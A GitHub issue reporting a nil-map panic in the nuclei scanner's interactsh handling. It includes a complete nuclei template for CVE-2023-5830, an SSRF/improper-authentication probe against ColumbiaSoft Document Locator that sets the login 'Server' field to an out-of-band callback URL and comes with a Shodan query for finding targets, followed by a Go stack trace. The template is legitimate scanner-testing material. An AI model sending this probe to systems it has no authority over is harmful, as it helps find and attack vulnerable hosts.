### ISSUE TITLE
Panic on Errored  HTTP Request that uses Interactsh 

### ISSUE THREAD

**Issue by tarunKoyalwar** [projectdiscovery/nuclei#4979]
### Nuclei version:

main(recovered)  | dev

### Current Behavior:

```yaml
id: CVE-2023-5830

info:
  name: ColumbiaSoft DocumentLocator - Improper Authentication
  author: Gonski
  severity: critical
  description: |
    Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.
  impact: |
    An attacker could exploit this vulnerability to gain unauthorized access to sensitive information.
  remediation: |
    Upgrade to a patched version of ColumbiaSoft DocumentLocator to fix the improper authentication issue.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5830
    - https://vuldb.com/?ctiid.243729
    - https://github.com/advisories/GHSA-j89v-wm7x-4434
    - https://vuldb.com/?id.243729
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5830
    cwe-id: CWE-287
    epss-score: 0.00091
    epss-percentile: 0.37579
    cpe: cpe:2.3:a:documentlocator:document_locator:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: documentlocator
    product: document_locator
    shodan-query: 'title:"Document Locator - WebTools"'
  tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools

http:
  - raw:
      - |
        POST /api/authentication/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}
        
        {
          "LoginType":"differentWindows",
          "User":"{{randstr}}",
          "Password":"{{rand_base(5, "abc")}}",
          "Domain":"{{randstr}}",
          "Server":"{{interactsh-url}}",
          "Repository":"{{randstr}}"
        }
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '"Authorized":false'
```

```console
$  ./nuclei -u $TARGET -t a.yaml -v -ms 

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.2.3-dev

		projectdiscovery.io

[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.2.3-dev (development)
[INF] Current nuclei-templates version: v9.8.0 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 85
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.me
panic: assignment to entry in nil map

goroutine 27 [running]:
github.com/projectdiscovery/nuclei/v3/pkg/protocols/common/interactsh.(*Client).processInteractionForRequest(0x1400176a420, 0x14000c9e4d0, 0x14000b7e330)
	/Users/tarun/Codebase/nuclei/pkg/protocols/common/interactsh/interactsh.go:157 +0x78
github.com/projectdiscovery/nuclei/v3/pkg/protocols/common/interactsh.(*Client).RequestEvent(0x1400176a420, {0x14000f7efe0?, 0x1, 0x29?}, 0x14000b7e330)
	/Users/tarun/Codebase/nuclei/pkg/protocols/common/interactsh/interactsh.go:340 +0x204
github.com/projectdiscovery/nuclei/v3/pkg/protocols/http.(*Request).ExecuteWithResults.func1.1(0x14000c8f450)
	/Users/tarun/Codebase/nuclei/pkg/protocols/http/request.go:410 +0x494
github.com/projectdiscovery/nuclei/v3/pkg/protocols/http.(*Request).executeRequest(0x14000b16780, 0x14000487e78, 0x14000d06540, 0x14001089290, 0x1, 0x140010eb988, 0x0?)
	/Users/tarun/Codebase/nuclei/pkg/protocols/http/request.go:699 +0x2a2c
github.com/projectdiscovery/nuclei/v3/pkg/protocols/http.(*Request).ExecuteWithResults.func1({0x14000088340, 0x18e}, 0x140010891d0?, 0x30?)
	/Users/tarun/Codebase/nuclei/pkg/protocols/http/request.go:396 +0x44c
github.com/projectdiscovery/nuclei/v3/pkg/protocols/http.(*Request).ExecuteWithResults(0x14000b16780, 0x14000487e78, 0x140010890e0, 0x14001089290, 0x140010892c0)
	/Users/tarun/Codebase/nuclei/pkg/protocols/http/request.go:460 +0x25c
github.com/projectdiscovery/nuclei/v3/pkg/tmplexec/generic.(*Generic).ExecuteWithResults(0x140010883c0, 0x14000612aa0)
	/Users/tarun/Codebase/nuclei/pkg/tmplexec/generic/exec.go:55 +0x268
github.com/projectdiscovery/nuclei/v3/pkg/tmplexec.(*TemplateExecuter).Execute(0x1400108a200, 0x14000612aa0)
	/Users/tarun/Codebase/nuclei/pkg/tmplexec/exec.go:166 +0x260
github.com/projectdiscovery/nuclei/v3/pkg/core.(*Engine).executeTemplateWithTargets.func2.1(0x46d860?, 0x40?, 0x1400108a3c0)
	/Users/tarun/Codebase/nuclei/pkg/core/executors.go:132 +0x184
created by github.com/projectdiscovery/nuclei/v3/pkg/core.(*Engine).executeTemplateWithTargets.func2 in goroutine 26
	/Users/tarun/Codebase/nuclei/pkg/core/executors.go:108 +0x3e0
```

### Expected Behavior:

- no panic
